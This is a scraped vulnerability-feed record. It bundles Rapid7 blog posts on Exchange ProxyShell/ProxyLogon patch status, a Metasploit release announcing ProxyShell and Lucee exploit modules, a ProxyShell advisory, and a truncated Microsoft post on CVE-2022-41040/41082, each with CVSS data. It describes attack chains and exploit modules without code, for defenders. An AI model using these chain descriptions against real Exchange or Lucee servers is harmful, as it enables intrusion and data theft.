[Q3](<https://www.rapid7.com/blog/post/2022/09/28/whats-new-in-insightvm-and-nexpose-q3-2022-in-review/>) \\- to get more information on product improvements and key vulnerability coverages.\n\n### Customer Stories and Resources\n\nThe past year, we had the privilege to share stories of how our customers are using Insight VM to secure their environment. 
[Check out how your peers are leveraging InsightVM](<https://www.rapid7.com/customers/customer-stories/?page=1&p=InsightVM>). Here's what one customer had to say:\n\n### \u201cThat is one of the things we value most about InsightVM; it has the capacity to pinpoint actively-exploited vulnerabilities, so we can prioritize and direct our attention where it's needed most.\u201d - _[Daniel Hernandez, Information Security Analyst III at Pioneer Telephone Cooperative, Inc](<https://www.rapid7.com/customers/pioneer-telephone-cooperative/>)._\n\nFor customers looking to improve the utilization of the Vulnerability Management tool, check out this webcast series that covers the different phases of the VM lifecycle - [Discovery](<https://academy.rapid7.com/path/insightvm-deep-dive-webcasts/insightvm-customer-webcast-vulnerability-management-lifecycle-discovery>), [Analyze](<https://academy.rapid7.com/path/insightvm-deep-dive-webcasts/vulnerability-management-lifecycle-analyze>), [Communicate](<https://academy.rapid7.com/path/insightvm-deep-dive-webcasts/vulnerability-management-lifecycle-communicate>), and [Remediate](<https://academy.rapid7.com/path/insightvm-deep-dive-webcasts/vulnerability-management-lifecycle-remediate>). Lastly, customers can always leverage [Rapid7 Academy to participate in workshops](<https://academy.rapid7.com/page/product-workshops#rapid7-product_insightvm>) and training to continue their learning journey.\n\n### Looking forward to 2023\n\nWe will maintain the customer-centricity in 2023 as we continue to deliver features and improvements in customers' best interests. We will be holding a [webinar](<https://information.rapid7.com/agent-based-policy-webinar-register.html>) on January 24 around configuration assessment in InsightVM agent-based policy. 
And, as always, be on the lookout for our annual vulnerability intelligence report coming soon to a Q1 near you ([here's last year's](<https://www.rapid7.com/info/2021-vulnerability-intelligence-report/>))!", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2023-01-09T17:00:00", "type": "rapid7blog", "title": "Year in Review: Rapid7 Vulnerability Management", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2022-26134", "CVE-2022-3602", "CVE-2022-3786", "CVE-2022-40684", "CVE-2022-41040", "CVE-2022-41082"], "modified": "2023-01-09T17:00:00", "id": "RAPID7BLOG:6F833E0DB9E152EB8397D33430FECB7F", "href": "https://blog.rapid7.com/2023/01/09/year-in-review-vulnerability-management/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-06T15:02:24", "description": "\n\nIf you've been keeping tabs on the state of vulnerabilities, you've probably noticed that Microsoft Exchange has been in the news more than usual lately. 
Back in March 2021, Microsoft [acknowledged a series of threats](<https://www.rapid7.com/blog/post/2021/03/03/mass-exploitation-of-exchange-server-zero-day-cves-what-you-need-to-know/>) exploiting zero-day CVEs in on-premises instances of Exchange Server. Since then, several related exploit chains targeting Exchange have [continued to be exploited in the wild](<https://www.rapid7.com/blog/post/2021/08/12/proxyshell-more-widespread-exploitation-of-microsoft-exchange-servers/>).\n\nMicrosoft [quickly](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473>) [released](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523>) [patches](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31207>) to help security teams keep attackers out of their Exchange environments. So, what does the state of patching look like today among organizations running impacted instances of Exchange?\n\nThe answer is more mixed \u2014 and more troubling \u2014 than you'd expect.\n\n## What is Exchange, and why should you care?\n\nExchange is a popular email and messaging service that runs on Windows Server operating systems, providing email and calendaring services to tens of thousands of organizations. It also integrates with unified messaging, video chat, and phone services. That makes Exchange an all-in-one messaging service that can handle virtually all communication streams for an enterprise customer.\n\nAn organization's Exchange infrastructure can contain copious amounts of sensitive business and customer information in the form of emails and a type of shared mailbox called Public Folders. This is one of the reasons why Exchange Server vulnerabilities pose such a significant threat. 
Once compromised, Exchange's search mechanisms can make this data easy to find for attackers, and a robust rules engine means attackers can create hard-to-find automation that forwards data out of the organization.\n\nAn attacker who manages to get into an organization's Exchange Server could gain visibility into their Active Directory or even compromise it. They could also steal credentials and impersonate an authentic user, making phishing and other attempts at fraud more likely to land with targeted victims.\n\n## Sizing up the threats\n\nThe credit for discovering this recent family of Exchange Server vulnerabilities goes primarily to security researcher Orange Tsai, who overviewed them in an August 2021 [Black Hat talk](<https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-ProxyLogon-Is-Just-The-Tip-Of-The-Iceberg-A-New-Attack-Surface-On-Microsoft-Exchange-Server.pdf>). He cited 8 vulnerabilities, which resulted in 3 exploit chains:\n\n * ****ProxyLogon:**** This vulnerability could allow attackers to use pre-authentication server-side request forgery (SSRF) plus a post-authentication arbitrary file write, resulting in remote code execution (RCE) on the server.\n * ****ProxyOracle:**** With a cookie from an authenticated user (obtained through a reflected XSS link), a Padding Oracle attack could provide an intruder with plain-text credentials for the user.\n * ****ProxyShell: ****Using a pre-authentication access control list (ACL) bypass, a PrivEsc (not going up to become an administrator but down to a user mailbox), and a post-authentication arbitrary file write, this exploit chain could allow attackers to execute an RCE attack.\n\nGiven the sensitivity of Exchange Server data and the availability of [patches and resources from Microsoft](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>) to help defend against these threats, you'd think adoption of these patches would be almost universal. 
But unfortunately, the picture of patching for this family of vulnerabilities is still woefully incomplete.\n\n## A patchwork of patch statuses\n\nIn Rapid7's OCTO team, we keep tabs on the exposure for major vulnerabilities like these, to keep our customers and the security community apprised of where these threats stand and if they might be at risk. To get a good look at the patch status among Exchange Servers for this family of attack chains, we had to develop new techniques for fingerprinting Exchange versions so we could determine which specific hotfixes had been applied.\n\nWith a few tweaks, we were able to adjust our measurement approach to get a clear enough view that we can draw some strong conclusions about the patch statuses of Exchange Servers on the public-facing internet. Here's what we found:\n\n * Out of the 306,552 Exchange OWA servers we observed, 222,145 \u2014 or 72.4% \u2014 were running an impacted version of Exchange (this includes 2013, 2016, and 2019).\n * Of the impacted servers, 29.08% were still unpatched for the ProxyShell vulnerability, and 2.62% were partially patched. That makes 31.7% of servers that may still be vulnerable.\n\n\n\nTo put it another, starker way: 6 months after patches have been available for the ProxyLogon family of vulnerabilities, 1 in 3 impacted Exchange Servers are still susceptible to attacks using the ProxyShell method.\n\nWhen we sort this data by the Exchange Server versions that organizations are using, we see the uncertainty in patch status tends to cluster around specific versions, particularly 2013 Cumulative Update 23. 
\n\n\n\nWe also pulled the server header for these instances with the goal of using the version of IIS as a proxy indicator of what OS the servers may be running \u2014 and we found an alarmingly large proportion of instances that were running end-of-life servers and/or operating systems, for which Microsoft no longer issues patch updates.\n\n\n\nThat group includes the two bars on the left of this graph, which represent 2007 and 2010 Exchange Server versions: 75,300 instances of 2010 and 8,648 instances of 2007 are still running out there on the internet, roughly 27% of all instances we observed. Organizations still operating these products can count themselves lucky that ProxyShell and ProxyLogon don't impact these older versions of Exchange (as far as we know). But that doesn't mean those companies are out of the woods \u2014 if you still haven't replaced Exchange Server 2010, you're probably also doing other risky things in your environment.\n\nLooking ahead, the next group of products that will go end-of-life are the Windows Server 2012 and 2012 R2 operating systems, represented in green and yellow, respectively, within the graph. That means 92,641 instances of Exchange \u2014 nearly a third of all Exchange Servers on the internet \u2014 will be running unsupported operating systems for which Microsoft isn't obligated to provide security fixes after they go end-of-life in 2023.\n\n## What you can do now\n\nIt's a matter of when, not if, we encounter the next family of vulnerabilities that lets attackers have a field day with huge sets of sensitive data like those contained in Exchange Servers. And for companies that haven't yet patched, ProxyShell and its related attack chains are still a real threat. 
Here's what you can do now to proactively mitigate these vulnerabilities.\n\n * First things first: If your organization is running one of the 1 in 3 affected instances that are vulnerable due to being unpatched, [install the appropriate patch](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>) right away.\n * Stay current with patch updates as a routine priority. It is possible to build Exchange environments with near-100% uptimes, so there isn't much argument to be made for foregoing critical patches in order to prevent production interruptions.\n * If you're running a version of Exchange Server or Windows OS that will soon go end-of-life, start planning for how you'll update to products that Microsoft will continue to support with patches. This way, you'll be able to quickly and efficiently mitigate vulnerabilities that arise, before attackers take advantage of them.\n\nIf you're already a Rapid7 customer, there's good news: [InsightVM](<https://www.rapid7.com/products/insightvm/>) already has authenticated scans to detect these vulnerabilities, so users of the product should already have a good sense of where their Exchange environments stand. On the offensive side, your red teams and penetration testers can highlight the risk of running vulnerable Exchange instances with modules exercising [ProxyLogon](<https://www.rapid7.com/db/modules/exploit/windows/http/exchange_proxylogon_rce/>) and [ProxyShell](<https://www.rapid7.com/db/modules/exploit/windows/http/exchange_proxyshell_rce/>). 
And as our research team continues to develop techniques for getting this kind of detailed information about exposures, we ensure our products know about those methods so they can more effectively help customers understand their vulnerabilities.\n\nBut for all of us, these vulnerabilities are a reminder that security requires a proactive mindset \u2014 and failing to cover the basics like upgrading to supported products and installing security updates leaves organizations at risk when a particularly thorny set of attack chains rears its head.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-06T14:07:12", "type": "rapid7blog", "title": "For Microsoft Exchange Server Vulnerabilities, Patching Remains Patchy", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-10-06T14:07:12", "id": "RAPID7BLOG:D47FB88807F2041B8820156ECFB85720", "href": 
"https://blog.rapid7.com/2021/10/06/for-microsoft-exchange-server-vulnerabilities-patching-remains-patchy/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-20T20:19:12", "description": "## Anyone enjoy making chains?\n\n\n\nThe community is hard at work building chains to pull sessions out of vulnerable Exchange servers. This week Rapid7's own [wvu](<https://github.com/wvu-r7>) & [Spencer McIntyre](<https://github.com/zeroSteiner>) added a module that implements the ProxyShell exploit chain originally demonstrated by [Orange Tsai](<https://twitter.com/orange_8361>). The module also benefited from research and analysis by [Jang](<https://twitter.com/testanull>), [PeterJson](<https://twitter.com/peterjson>), [brandonshi123](<https://github.com/brandonshiyay>), and [mekhalleh (RAMELLA S\u00e9bastien)](<https://twitter.com/Mekhalleh>) to make it as simple as finding an email for an administrator of a vulnerable version of Exchange as the entrypoint to chain [CVE-2021-31207](<https://attackerkb.com/topics/5F0CGZWw61/cve-2021-31207?referrer=blog>), [CVE-2021-34523](<https://attackerkb.com/topics/RY7LpTmyCj/cve-2021-34523?referrer=blog>), & [CVE-2021-34473](<https://attackerkb.com/topics/pUK1MXLZkW/cve-2021-34473?referrer=blog>) into sessions for everyone to enjoy.\n\n## Great to see some GSoC value in the wild.\n\nWith Google Summer of Code 2021 moving into its final phases, [pingport80](<https://github.com/pingport80>) had 4 PRs land in this week's release. 
These improvements and fixes to interactions with sessions make post-exploitation tasks more accessible, bringing the community more capabilities and stability along the way.\n\n## New module content (2)\n\n * [Lucee Administrator imgProcess.cfm Arbitrary File Write](<https://github.com/rapid7/metasploit-framework/pull/15525>) by [wvu](<https://github.com/wvu-r7>), [iamnoooob](<https://github.com/iamnoooob>), and [rootxharsh](<https://github.com/rootxharsh>), which exploits [CVE-2021-21307](<https://attackerkb.com/topics/16OOl6KSdo/cve-2021-21307?referrer=blog>) \\- An unauthenticated user is permitted to make requests through the `imgProcess.cfm` endpoint, and using the `file` parameter which contains a directory traversal vulnerability, they can write a file to an arbitrary location. Combining the two capabilities, this module writes a CFML script to the vulnerable server and achieves unauthenticated code execution as the user running the Lucee server.\n * [Microsoft Exchange ProxyShell RCE](<https://github.com/rapid7/metasploit-framework/pull/15561>) by [wvu](<https://github.com/wvu-r7>), [Jang](<https://twitter.com/testanull>), [Orange Tsai](<https://twitter.com/orange_8361>), [PeterJson](<https://twitter.com/peterjson>), [Spencer McIntyre](<https://github.com/zeroSteiner>), [brandonshi123](<https://github.com/brandonshiyay>), and [mekhalleh (RAMELLA S\u00e9bastien)](<https://twitter.com/Mekhalleh>), which exploits [CVE-2021-31207](<https://attackerkb.com/topics/5F0CGZWw61/cve-2021-31207?referrer=blog>) \\- Added an exploit for the ProxyShell attack chain against Microsoft Exchange Server.\n\n## Enhancements and features\n\n * [#15540](<https://github.com/rapid7/metasploit-framework/pull/15540>) from [dwelch-r7](<https://github.com/dwelch-r7>) \\- This adds an option to `cmd_execute` to have the command run in a subshell by Meterpreter.\n * [#15556](<https://github.com/rapid7/metasploit-framework/pull/15556>) from [pingport80](<https://github.com/pingport80>) 
\\- This adds shell session compatibility to the `post/windows/gather/enum_unattend` module.\n * [#15564](<https://github.com/rapid7/metasploit-framework/pull/15564>) from [pingport80](<https://github.com/pingport80>) \\- This adds support to the `get_env` and `command_exists?` post API methods for PowerShell session types.\n\n## Bugs fixed\n\n * [#15303](<https://github.com/rapid7/metasploit-framework/pull/15303>) from [pingport80](<https://github.com/pingport80>) \\- This PR ensures that the shell `dir` command returns a list.\n * [#15332](<https://github.com/rapid7/metasploit-framework/pull/15332>) from [pingport80](<https://github.com/pingport80>) \\- This improves localization support and compatibility in the session post API related to the `rename_file` method.\n * [#15539](<https://github.com/rapid7/metasploit-framework/pull/15539>) from [tomadimitrie](<https://github.com/tomadimitrie>) \\- This improves the OS version check in the `check` method of `exploit/windows/local/cve_2018_8453_win32k_priv_esc`.\n * [#15546](<https://github.com/rapid7/metasploit-framework/pull/15546>) from [timwr](<https://github.com/timwr>) \\- This ensures that the UUID URLs of stageless reverse_http(s) payloads are stored in the database so that they can be properly tracked with payload UUID tracking. 
This also fixes an error caused by accessing contents of a url list without checking if it's valid first.\n * [#15570](<https://github.com/rapid7/metasploit-framework/pull/15570>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This fixes a bug in the `auxiliary/scanner/smb/smb_enum_gpp` module where the path that was being generated by the module caused an SMB exception to be raised.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` and you can get more details on the changes since the last blog post from GitHub:\n\n * [Pull Requests 6.1.0...6.1.1](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-08-12T17%3A57%3A38%2B01%3A00..2021-08-20T05%3A13%3A43-05%3A00%22>)\n * [Full diff 6.1.0...6.1.1](<https://github.com/rapid7/metasploit-framework/compare/6.1.0...6.1.1>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. 
To install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the [binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-20T19:12:00", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21307", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-08-20T19:12:00", "id": "RAPID7BLOG:7B1DD656DC72802EE7230867267A5A16", "href": "https://blog.rapid7.com/2021/08/20/metasploit-wrap-up-126/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-25T18:57:37", "description": "\n\n_This attack is ongoing. See the `Updates` section at the end of this post for new information as it comes to light. 
Rapid7 also has a [technical analysis of the ProxyShell exploit chain](<https://attackerkb.com/topics/xbr3tcCFT3/proxyshell-exploit-chain/rapid7-analysis>) in AttackerKB._\n\nOn August 5, 2021, in [a Black Hat USA talk](<https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-ProxyLogon-Is-Just-The-Tip-Of-The-Iceberg-A-New-Attack-Surface-On-Microsoft-Exchange-Server.pdf>), DEVCORE researcher Orange Tsai shared information on [several exploit chains](<https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html>) targeting on-premises installations of Microsoft Exchange Server. Among the exploit chains presented were ProxyLogon, which was [exploited en masse in February and March](<https://www.rapid7.com/blog/post/2021/03/03/mass-exploitation-of-exchange-server-zero-day-cves-what-you-need-to-know/>) of 2021, and ProxyShell, an attack chain originally demonstrated at the Pwn2Own hacking competition this past April. As of August 12, 2021, multiple researchers have detected widespread opportunistic [scanning](<https://twitter.com/bad_packets/status/1425598895569006594>) and [exploitation](<https://twitter.com/GossiTheDog/status/1425844380376735746>) of Exchange servers using the ProxyShell chain.\n\nAccording to Orange Tsai's demonstration, the ProxyShell exploit chain allows a remote unauthenticated attacker to execute arbitrary commands on a vulnerable on-premises instance of Microsoft Exchange Server via port 443. 
The exploit is comprised of three discrete CVEs:\n\n * [CVE-2021-34473](<https://www.rapid7.com/db/vulnerabilities/msft-cve-2021-34473/>), a remote code execution vulnerability [patched April 13, 2021](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473>)\n * [CVE-2021-34523](<https://www.rapid7.com/db/vulnerabilities/msft-cve-2021-34523/>), an elevation of privilege vulnerability [patched April 13, 2021](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523>)\n * [CVE-2021-31207](<https://www.rapid7.com/db/vulnerabilities/msft-cve-2021-31207/>), a security feature bypass [patched May 11, 2021](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31207>)\n\n_While CVE-2021-34473 and CVE-2021-34523 were patched in April, Microsoft\u2019s advisories note that they were inadvertently omitted from publication until July._\n\nWhen chained, these vulnerabilities allow the attacker to bypass ACL controls, send a request to a PowerShell back-end, and elevate privileges, effectively authenticating the attacker and allowing for remote code execution. Both public and private proof-of-concept exploits have been released as of August 18, 2021\u2014not surprising, since ProxyShell was first demonstrated more than four months ago at Pwn2Own. A number of [technical analyses](<https://y4y.space/2021/08/12/my-steps-of-reproducing-proxyshell/>) of the chain have also [been published](<https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1>). 
See Rapid7's exploit chain analysis [in AttackerKB](<https://attackerkb.com/topics/xbr3tcCFT3/proxyshell-exploit-chain/rapid7-analysis>).\n\nNotably, there has been confusion about which CVE is which across various advisories and research descriptions \u2014 Microsoft, for instance, describes CVE-2021-34473 as a remote code execution vulnerability, but [Orange Tsai\u2019s Black Hat slides](<https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-ProxyLogon-Is-Just-The-Tip-Of-The-Iceberg-A-New-Attack-Surface-On-Microsoft-Exchange-Server.pdf>) list CVE-2021-34473 as the initial ACL bypass. Community researchers have also [expressed confusion](<https://twitter.com/GossiTheDog/status/1424791670076411905>) over CVE numbering across the ProxyShell chain, but ultimately, the takeaway is the same: Organizations that have not patched these vulnerabilities should do so on an emergency basis and invoke incident response protocols to look for indicators of compromise.\n\n## Affected products\n\nThe following versions of Exchange Server are vulnerable to all three ProxyShell CVEs:\n\n * Microsoft Exchange Server 2019 Cumulative Update 9\n * Microsoft Exchange Server 2019 Cumulative Update 8\n * Microsoft Exchange Server 2016 Cumulative Update 20\n * Microsoft Exchange Server 2016 Cumulative Update 19\n * Microsoft Exchange Server 2013 Cumulative Update 23\n\nOrganizations that rely on on-premises installations of Exchange Server and are not able to move to O365 should ensure that all Exchange instances are patched on a zero-day basis. 
In order to do this, it is vital that defenders keep up to date with quarterly Cumulative Updates, since Microsoft only releases security fixes for [the most recent Cumulative Update versions](<https://docs.microsoft.com/en-us/exchange/new-features/updates>).\n\nWhile ProxyShell and March\u2019s ProxyLogon exploit chain are the two attacks that have already resulted in widespread exploitation, they are not the only exploit chains targeting on-premises Exchange servers. Exchange continues to be a valuable and accessible attack surface for both sophisticated and run-of-the-mill threat actors, and we will certainly see additional widespread exploitation in the future.\n\nRead more from our emergent threat response team on [high-priority attack surface area](<https://www.rapid7.com/blog/post/2021/08/12/popular-attack-surfaces-august-2021-what-you-need-to-know/>), including Windows Print Spooler and Pulse Connect Secure VPNs.\n\n## Rapid7 customers\n\nInsightVM and Nexpose customers can assess their exposure to all three ProxyShell CVEs with authenticated vulnerability checks.\n\nThe following attacker behavior detection is available to InsightIDR customers:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n\nThis detection identifies processes spawned by Microsoft IIS processes that have been configured to serve as Outlook Web Access web servers for Microsoft Exchange. Rogue processes being spawned may indicate a successful attack against these systems, and this behavior has been observed in attacks by various malicious actors.\n\nIf this detection fires in your environment, you should determine whether it is part of authorized administrator activity. Examine the parent process that spawned the command, and anything else that process may have spawned. 
If this activity is not benign or expected, consider rebuilding the host from a known, good source and having any possibly affected users change their passwords.\n\n## Updates\n\n**August 25, 2021:** Rapid7 estimates that there are over 84,000 Exchange servers that appear vulnerable to the ProxyShell attack chain. \n\n\n**August 23, 2021:** Multiple sources have now [reported](<https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockfile-ransomware-new-petitpotam-windows>) that at least one ransomware gang (LockFile) is chaining ProxyShell with PetitPotam (CVE-2021-36942) to compromise Windows domain controllers. See [Rapid7's blog on PetitPotam](<https://www.rapid7.com/blog/post/2021/08/03/petitpotam-novel-attack-chain-can-fully-compromise-windows-domains-running-ad-cs/>) for patching and additional required mitigation advice.\n\n**August 21, 2021:** Rapid7's Managed Detection and Response (MDR) and Incident Response (IR) teams have noted a significant uptick in Exchange exploitation by multiple threat actors. Community researchers have also noted that attackers are exploiting the ProxyShell vulnerabilities to drop webshells and [spread ransomware](<https://doublepulsar.com/multiple-threat-actors-including-a-ransomware-gang-exploiting-exchange-proxyshell-vulnerabilities-c457b1655e9c>) on vulnerable targets.\n\nWe are monitoring for additional attacker behavior and will update this blog as further information comes to light.\n\n**August 16, 2021:** We have begun to see public proof-of-concept (PoC) code implementing the ProxyShell exploit chain. 
Exploitation is ongoing.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-12T21:08:43", "type": "rapid7blog", "title": "ProxyShell: More Widespread Exploitation of Microsoft Exchange Servers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-36942"], "modified": "2021-08-12T21:08:43", "id": "RAPID7BLOG:03B1EB65D8A7CFE486943E2472225BA1", "href": "https://blog.rapid7.com/2021/08/12/proxyshell-more-widespread-exploitation-of-microsoft-exchange-servers/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mssecure": [{"lastseen": "2022-10-07T17:09:27", "description": "> **October 1, 2022** **update** \u2013 Added information about _Exploit:Script/ExchgProxyRequest.A_, Microsoft Defender AV\u2019s robust detection for exploit behavior related to this threat. We also removed a section on MFA as a mitigation, which was included in a prior version of this blog as standard guidance. 
\n\nMicrosoft is aware of [limited targeted attacks](<https://gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html>) using two reported zero-day vulnerabilities affecting Microsoft Exchange Server 2013, Exchange Server 2016, and Exchange Server 2019. The first one, identified as CVE-2022-41040, is a server-side request forgery (SSRF) vulnerability, while the second one, identified as CVE-2022-41082, allows remote code execution (RCE) when Exchange PowerShell is accessible to the attacker. Refer to the [Microsoft Security Response Center blog](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>) for mitigation guidance regarding these vulnerabilities. \n\nCVE-2022-41040 can enable an authenticated attacker to remotely trigger CVE-2022-41082. However, authenticated access to the vulnerable Exchange Server is necessary to successfully exploit either vulnerability, and they can be used separately.\n\nMicrosoft Defender Antivirus and Microsoft Defender for Endpoint detect malware and activity associated with these attacks. Microsoft will continue to monitor threats that take advantage of these vulnerabilities and take necessary response actions to protect customers.\n\n## Analysis of observed activity\n\n### Attacks using Exchange vulnerabilities prior to public disclosure\n\nMSTIC observed activity related to a single activity group in August 2022 that achieved initial access and compromised Exchange servers by chaining CVE-2022-41040 and CVE-2022-41082 in a small number of targeted attacks. These attacks installed the Chopper web shell to facilitate hands-on-keyboard access, which the attackers used to perform Active Directory reconnaissance and data exfiltration. Microsoft observed these attacks in fewer than 10 organizations globally. 
MSTIC assesses with medium confidence that the single activity group is likely to be a state-sponsored organization.\n\nMicrosoft researchers were investigating these attacks to determine if there was a new exploitation vector in Exchange involved when the Zero Day Initiative (ZDI) disclosed CVE-2022-41040 and CVE-2022-41082 to Microsoft Security Response Center (MSRC) in September 2022.\n\nFigure 1: Diagram of attacks using Exchange vulnerabilities CVE-2022-41040 and CVE-2022-41082\n\n### Observed activity after public disclosure\n\nOn September 28, 2022, GTSC released a [blog](<https://gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html>) disclosing an exploit previously reported to Microsoft via the Zero Day Initiative and detailing its use in an attack in the wild. Their blog details one example of chained exploitation of CVE-2022-41040 and CVE-2022-41082 and discusses the exploitation details of CVE-2022-41040. It is expected that similar threats and overall exploitation of these vulnerabilities will increase, as security researchers and cybercriminals adopt the published research into their toolkits and proof of concept code becomes available.\n\nWhile these vulnerabilities require authentication, the authentication needed for exploitation can be that of a standard user. Standard user credentials can be acquired via many different attacks, such as password spray or purchase via the cybercriminal economy. 
Prior Exchange vulnerabilities that require authentication have been adopted into the toolkits of attackers who deploy ransomware, and these vulnerabilities are likely to be included in similar attacks due to the highly privileged access Exchange systems confer onto an attacker.\n\n## Mitigation\n\nCustomers should refer to [Microsoft Security Response Center\u2019s post](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>) for the latest on mitigations for the Exchange product.\n\nMicrosoft Exchange Server customers using [Microsoft 365 Defender](<https://www.microsoft.com/en-us/security/business/siem-and-xdr/microsoft-365-defender>) are advised to follow this checklist:\n\n * Turn on [cloud-delivered protection](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-block-at-first-sight-microsoft-defender-antivirus?view=o365-worldwide>) in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a huge majority of new and unknown variants.\n * Turn on [tamper 